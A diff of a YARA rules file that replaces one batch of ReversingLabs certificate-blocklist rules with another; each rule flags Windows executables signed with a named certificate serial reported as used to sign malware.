-rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4520e544-7a41-5dde-b90b-46cf3349297c"
+		id = "bad5b57e-185a-5872-9817-a7d688e24fe7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10296-L10312"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3194-L3212"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13303,21 +37968,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zimmi Consulting Inc" and pe.signatures [ i ] . serial == "06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Singh Agile Content Design Limited" and ( pe.signatures [ i ] . serial == "00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures [ i ] . serial == "8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" ) and 1542585600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "25229478-e891-5e0a-b738-6ca1fdd0012c"
+		id = "8a90cc61-4d39-58eb-a102-c22d096d99ae"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10314-L10332"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3214-L3232"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13327,21 +37992,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOD MEDIA LIMITED" and ( pe.signatures [ i ] . serial == "00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures [ i ] . serial == "9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" ) and 1646438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLON LTD" and ( pe.signatures [ i ] . serial == "00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures [ i ] . serial == "b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" ) and 1554249600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4e23648f-9770-53ad-9c62-6e6239a02aa7"
+		id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10334-L10350"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3234-L3250"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13351,21 +38016,21 @@ rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TACHOPARTS SP Z O O" and pe.signatures [ i ] . serial == "06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f5852c4-7866-5e12-97e9-c73972def6c5"
+		id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10352-L10370"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3252-L3268"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13375,21 +38040,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and ( pe.signatures [ i ] . serial == "00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures [ i ] . serial == "ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" ) and 1625011200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACHNA PLITKA, TOV" and pe.signatures [ i ] . serial == "69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd2a2165-494b-5655-a322-73f033643c74"
+		id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10372-L10388"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3270-L3286"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13399,21 +38064,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOVA CONSULTANCY LTD" and pe.signatures [ i ] . serial == "73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "938cdd31-433d-5df7-b00e-54a7e440810b"
+		id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10390-L10406"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3288-L3304"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13423,21 +38088,21 @@ rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures [ i ] . serial == "48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "792111be-7c8a-53f5-9ec3-e1f25f083666"
+		id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10408-L10424"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3306-L3322"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13447,21 +38112,21 @@ rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divertida Creative Limited" and pe.signatures [ i ] . serial == "08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABADAN PIZZA LTD" and pe.signatures [ i ] . serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479"
+		id = "dacac5fe-00dc-5080-a725-9ef69473c45e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10426-L10442"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3324-L3340"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13471,21 +38136,21 @@ rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Python Software Foundation" and pe.signatures [ i ] . serial == "2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLARYSOFT LTD" and pe.signatures [ i ] . serial == "0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31"
+		id = "80b39632-29a7-5932-a47b-736a9e8ed686"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10444-L10460"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3342-L3358"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13495,21 +38160,21 @@ rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAWRO SP Z O O" and pe.signatures [ i ] . serial == "03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUS Software GmbH" and pe.signatures [ i ] . serial == "3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a"
+		id = "306444d8-7573-58c6-b6fe-14d701942275"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10462-L10478"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3360-L3376"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13519,21 +38184,21 @@ rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFVIMPEX SRL" and pe.signatures [ i ] . serial == "7d:f2:df:ed:47:c6:fd:65:42:13:18:47:cf:fb:c1:02" and 1567036800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_74Fedf0F8398060Fa8378C6D174465C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "918fa696-5c92-551b-a87b-6410a6dc718a"
+		id = "eea46214-d0f5-5e92-b678-4a1df09025ce"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10480-L10496"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3378-L3394"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "406821c7990f05fdad91704f6418304f53dd4800bc4b41912177a1695858fade"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13543,21 +38208,21 @@ rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOCS PTY LTD" and pe.signatures [ i ] . serial == "74:fe:df:0f:83:98:06:0f:a8:37:8c:6d:17:44:65:c8" and 1566172800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bd6A5Bba28E7C1Ca44880159Dace237 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b025fe73-89fa-55f2-8b3a-cb46251669e6"
+		id = "c80245bd-908a-5b89-92e3-af0dd7bed63a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10498-L10514"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3396-L3412"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f885c782148947d09133a3cc65319e02204c21d6c6d911b360840f25f37601dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13567,21 +38232,21 @@ rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TECHNO BEAVERS LIMITED" and pe.signatures [ i ] . serial == "3b:d6:a5:bb:a2:8e:7c:1c:a4:48:80:15:9d:ac:e2:37" and 1563408000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C04F8F1E00C69E96A51Bf14Aab1C6Ae0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f5eee11-4106-5923-9563-84f81199bea0"
+		id = "6513160e-ece5-500b-8b0b-4b8a6e04c0af"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10516-L10532"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3414-L3432"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c2b5ffa305b761b57dd91c0acea0d8f82bec6b7d3608be10a20ea63621f3f3e8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13591,21 +38256,21 @@ rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHAIKA, TOV" and ( pe.signatures [ i ] . serial == "00:c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" or pe.signatures [ i ] . serial == "c0:4f:8f:1e:00:c6:9e:96:a5:1b:f1:4a:ab:1c:6a:e0" ) and 1551398400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_23F537Ce13C6Cccdfd3F8Ce81Fb981Cb : INFO FILE
 {
